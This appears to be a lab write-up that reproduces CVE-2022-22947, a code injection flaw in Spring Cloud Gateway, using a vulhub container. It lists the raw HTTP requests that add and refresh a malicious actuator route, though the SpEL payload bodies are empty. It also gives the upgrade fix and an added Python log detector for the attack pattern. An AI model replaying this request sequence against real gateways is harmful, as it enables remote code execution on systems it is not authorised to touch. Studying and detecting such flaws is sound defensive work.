Spring Cloud Gateway is an API gateway built on the Spring Framework and Spring Boot. It aims to give microservice architectures a simple, effective and unified way to manage API routing. Huawei Cloud reminds users of Spring Cloud Gateway to schedule a self-check promptly and carry out security hardening.
Reference links:
CVE-2022-22947: Spring Cloud Gateway Code Injection Vulnerability
CVE-2022-22947: SPEL CASTING AND EVIL BEANS
0x02 Vulnerable environment
I recommend just using vulhub; it's clean and tidy, guys.
vulhub/spring/CVE-2022-22947 at master · vulhub/vulhub (github.com)
docker-compose up -d
Once the service is up, visit http://your-ip:8080 to see the demo page.
0x03 Vulnerability reproduction
Exploiting this vulnerability takes several steps.
First, send the following request to add a route that contains a malicious SpEL expression:
(The payload here is the upgraded version, which uses AddResponseHeader to get the result echoed back.)
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Send the following request to view the execution result:

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

Then refresh the routes:

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Trigger it again, and the route is gone.
0x05 Fix
Upgrade to the latest version. The vendor has already released a fixed version that addresses this vulnerability:
https://github.com/spring-cloud/spring-cloud-gateway/tags
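As an added example (not part of the original post or of the Spring Cloud Gateway project), here is a small Python detector that reads web access logs and flags the request pattern shown above: a write to /actuator/gateway/routes/<id> followed by a POST to /actuator/gateway/refresh from the same client. The log lines are constructed for the demo; the format assumed is Common Log Format.

```python
import re
from collections import defaultdict

# Constructed sample access log lines (Common Log Format); not from any real system.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2022:10:00:01 +0000] "GET /actuator/health HTTP/1.1" 200 15
10.0.0.7 - - [01/Mar/2022:10:00:02 +0000] "POST /actuator/gateway/routes/hacktest HTTP/1.1" 201 0
10.0.0.7 - - [01/Mar/2022:10:00:03 +0000] "POST /actuator/gateway/refresh HTTP/1.1" 200 0
10.0.0.7 - - [01/Mar/2022:10:00:04 +0000] "GET /actuator/gateway/routes/hacktest HTTP/1.1" 200 512
10.0.0.9 - - [01/Mar/2022:10:00:05 +0000] "GET /actuator/gateway/routes HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Gateway actuator operations that change routing state: the CVE-2022-22947 abuse
# path is "create/modify a route with a SpEL filter, then refresh so it is loaded".
WRITE_ROUTE_RE = re.compile(r'^/actuator/gateway/routes/[^/?]+$')
REFRESH_PATH = '/actuator/gateway/refresh'

def parse_line(line):
    """Parse one CLF line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Return a finding label for one parsed entry, or None if it is not of interest."""
    method, path = entry['method'], entry['path']
    if method in ('POST', 'PUT', 'DELETE') and WRITE_ROUTE_RE.match(path):
        return 'route-write'
    if method == 'POST' and path == REFRESH_PATH:
        return 'route-refresh'
    if path.startswith('/actuator/gateway'):
        return 'gateway-actuator-read'
    return None

def analyze(log_text):
    """Flag every gateway-actuator request, plus the write-then-refresh sequence per client IP."""
    findings = []
    saw_write = defaultdict(bool)  # client IP -> has this IP already written a route?
    for e in filter(None, map(parse_line, log_text.splitlines())):
        label = classify(e)
        if label is None:
            continue
        findings.append((e['ip'], e['method'], e['path'], label))
        if label == 'route-write':
            saw_write[e['ip']] = True
        elif label == 'route-refresh' and saw_write[e['ip']]:
            findings.append((e['ip'], e['method'], e['path'], 'route-write-then-refresh'))
    return findings
```

In a real deployment the gateway actuator endpoint should not be reachable from untrusted networks at all, so any 'route-write' finding from an external address is worth an immediate look.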